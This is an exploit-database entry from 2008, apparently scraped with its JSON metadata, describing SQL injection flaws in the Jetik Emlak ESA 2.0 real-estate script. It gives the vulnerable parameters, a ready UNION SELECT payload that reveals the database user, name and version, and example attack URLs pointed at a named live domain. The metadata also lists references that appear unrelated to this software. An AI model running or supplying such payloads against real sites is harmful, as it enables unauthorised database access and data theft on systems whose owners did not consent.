ID 1337DAY-ID-3740
Type zdt
Reporter ZoRLu
Modified 2008-09-24T00:00:00
Description
Exploit for unknown platform in category web applications
=================================================================
Jetik Emlak ESA 2.0 Multiple Remote SQL Injection Vulnerabilities
=================================================================
[~] Jetik Emlak ESA 2.0 System Script
[~]
[~] (KayitNo) multiple remote sql inj
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 24.09.2008
[~]
[~] -----------------------------------------------------------
Exploit:
http://localhost/script_path/diger.php?KayitNo=[SQL]
http://localhost/script_path/sayfalar.php?KayitNo=[SQL]
[SQL]=
-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*
Example:
http://www.jetik.net/esa/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*
Example 2:
http://www.jetik.net/esa/sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*
# 0day.today [2018-01-04] #
{"published": "2008-09-24T00:00:00", "id": "1337DAY-ID-3740", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2018-01-04T11:05:08", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310882957", "OPENVAS:1361412562311220171105"]}, {"type": "mskb", "idList": ["KB4462143", "KB4484098"]}, {"type": "nessus", "idList": ["NEWSTART_CGSL_NS-SA-2019-0100_SAMBA4.NASL", "ORACLELINUX_ELSA-2018-2846.NASL", "NEWSTART_CGSL_NS-SA-2019-0096_SAMBA.NASL", "SUSE_SU-2019-0645-1.NASL", "PHOTONOS_PHSA-2018-1_0-0180_LINUX.NASL", "REDHAT-RHSA-2018-2846.NASL", "REDHAT-RHSA-2018-3459.NASL", "REDHAT-RHSA-2018-2925.NASL", "CENTOS_RHSA-2018-2846.NASL", "SL_20181009_KERNEL_ON_SL6_X.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:46941"]}, {"type": "zdt", "idList": ["1337DAY-ID-32820"]}, {"type": "redhat", "idList": ["RHSA-2018:2846", "RHSA-2018:3459", "RHSA-2018:2925"]}, {"type": "centos", "idList": ["CESA-2018:2846"]}], "modified": "2018-01-04T11:05:08", "rev": 2}, "vulnersScore": 1.0}, "type": "zdt", "lastseen": "2018-01-04T11:05:08", "edition": 2, "title": "Jetik Emlak ESA 2.0 Multiple Remote SQL Injection Vulnerabilities", "href": "https://0day.today/exploit/description/3740", "modified": "2008-09-24T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/3740", "references": [], "reporter": "ZoRLu", "sourceData": "=================================================================\r\nJetik Emlak ESA 2.0 Multiple Remote SQL Injection Vulnerabilities\r\n=================================================================\r\n\r\n\r\n\r\n[~] Jetik Emlak ESA 2.0 System Script\r\n[~]\r\n[~] (KayitNo) multiple remote sql inj\r\n[~]\r\n[~] ----------------------------------------------------------\r\n[~] Discovered By: ZoRLu\r\n[~]\r\n[~] Date: 24.09.2008\r\n[~]\r\n[~] -----------------------------------------------------------\r\n\r\nExploit:\r\n\r\nhttp://localhost/script_path/diger.php?KayitNo=[SQL]\r\n\r\nhttp://localhost/script_path/sayfalar.php?KayitNo=[SQL]\r\n\r\n[SQL]= \r\n\r\n-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*\r\n\r\nExample:\r\n\r\nhttp://www.jetik.net/esa/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*\r\n\r\nExample 2:\r\n\r\nhttp://www.jetik.net/esa/sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-04] #"}
{}
